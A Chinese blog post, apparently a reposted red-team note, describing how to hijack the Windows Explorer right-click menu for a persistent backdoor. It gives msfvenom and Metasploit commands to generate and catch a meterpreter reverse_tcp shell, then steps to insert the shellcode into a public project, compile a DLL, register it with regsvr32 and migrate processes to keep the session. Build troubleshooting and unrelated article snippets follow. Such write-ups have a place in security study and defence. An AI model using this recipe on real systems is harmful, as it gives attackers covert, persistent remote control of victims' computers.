劫持资源管理器实现持久性后门

VSole2023-03-27 09:48:18

0x01 前言

最近看到一篇有关《劫持Explorer.exe实现持久性》的文章,只要用户右键单击文件资源管理器中的文件或文件夹就会触发,简单记录下本地复现过程!

0x02 复现过程

CobaltStrike或Metasploit生成一个C格式shellcode,将shellcode中的"都替换为空,再用\r\n将其放在一行,配置好相关参数执行监听。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f c
set payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.120set lport 443exploit

VS打开该项目,在FileContextMenuExt.cpp第13行处插入我们处理好的shellcode,直接编译得到一个ContextMenuHijack.dll。

项目地址:

https://github.com/RistBS/ContextMenuHijack

接着我们通过执行以下命令用regsvr32注册下这个dll文件,如果想卸载掉只需加个/u参数即可。

注册:

regsvr32 ContextMenuHijack.dll

卸载:

regsvr32 /u ContextMenuHijack.dll

这时只要我们右键文件或文件夹就会触发上线,但这种方式极易造成Explorer.exe资源管理器奔溃,导致会话掉线,建议加个自动迁移进程参数。

set AutoRunScript migrate -f

0x03 编译问题

我的VS版本2017,但这个项目是2022编译的,所以编译时可能由于VS版本问题而出现下图报错:

错误 MSB8020 无法找到 v143 的生成工具(平台工具集 =“v143”)。若要使用 v143 生成工具进行生成,请安装 v143 生成工具。或者,可以升级到当前 Visual Studio 工具,方式是通过选择“项目”菜单或右键单击该解决方案,然后选择“重定解决方案目标”

解决方法:

选中项目 -> 右键属性 -> 将平台工具集选为VS2017(V141);选中工程 -> 重定解决方案目标 -> 选择当前Windows SDK版本;打开项目根目录下.vcxproj后缀文件,将v143全替换为v141,保存;切换回Visual Studio,检测到文件修改,我们选择“全部重新加载”;再次选中工程 -> 重新生成解决方案 -> 已经编译成功,完美解决该问题。

参考链接:

https://pentestlab.blog/2023/03/13/persistence-context-menu/https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html


本作品采用《CC 协议》,转载必须注明作者和本文链接
0x01 前言最近看到一篇有关《劫持Explorer.exe实现持久性》的文章,只要用户右键单击文件资源管理中的文件或文件夹就会触发,简单记录下本地复现过程!复现过程CobaltStrike或Metasploit生成一个C格式shellcode,将shellcode中的"都替换为空,再用\r\n将其放在一行,配置好相关参数执行监听。0x03 编译问题我的VS版本2017,但这个项目是2022编译的,所以编译时可能由于VS版本问题而出现下图报错:错误 MSB8020 无法找到 v143 的生成工具。若要使用 v143 生成工具进行生成,请安装 v143 生成工具。
介绍 巴西是一个著名的国家,有许多由当地骗子开发的银行木马。巴西地下犯罪分子是世界上一些最繁忙和最具创造力的网络犯罪肇事者的家园。他们的网络攻击具有很强的本地特色,而且很长一段时间以来,他们的攻击仅限...
Amadey Bot 恶意软件背后的运营商使用 SmokeLoader 通过软件破解和注册机站点分发新变种。 Amadey Bot 是一种数据窃取恶意软件,于 2018 年首次被发现,它还允许操作员安装额外的有效负载。该恶意软件可在非法论坛上出售,过去,它被 TA505 等网络犯罪团伙用来安装GandCrab勒索软件或FlawedAmmyy RAT。
在过去的一年里,一群攻击者通过恶意谷歌广告或虚假的 Facebook 个人资料传播窃取恶意软件的信息,以 Facebook 商业账户所有者为目标。
浅谈net-ntlm的利用
2022-12-16 10:38:09
浅谈net-ntlm的利用。
2022 年 1 月,发现了一个名为ChromeLoader(也称为 Choziosi Loader 和 ChromeBack)的新浏览器劫持者/广告软件活动。尽管使用了简单的恶意广告,该恶意软件还是变得广泛传播,可能会泄露成千上万用户和组织的数据。
针对容器会话级别流量不可见的特征,我们设计了一个基于机器学习的轻量级、非植入性的容器会话级流量预测框架X-Rayer,提高了容器流量预测的准确率。
自从计算机技术被广泛使用以来,恶意软件就一直以某种形式存在,但其存在的类型在不断发展演变。如今,随着人类社会数字化程度的不断提升,恶意软件已经成为现代企业组织面临的最严重安全威胁之一。
2022年1月,研究人员发现了一个名为ChromeLoader(也称为ChoziosiLoader和ChromeBack)的新浏览器劫持者/广告软件活动。尽管使用了简单的恶意广告,该恶意软件还是被广泛传播,可能会泄露成千上万用户和组织的数据。
新发现的与越南威胁行为者相关的恶意软件以用户为目标,通过LinkedIn网络钓鱼活动窃取数据和管理员权限以获取经济利益。
VSole
网络安全专家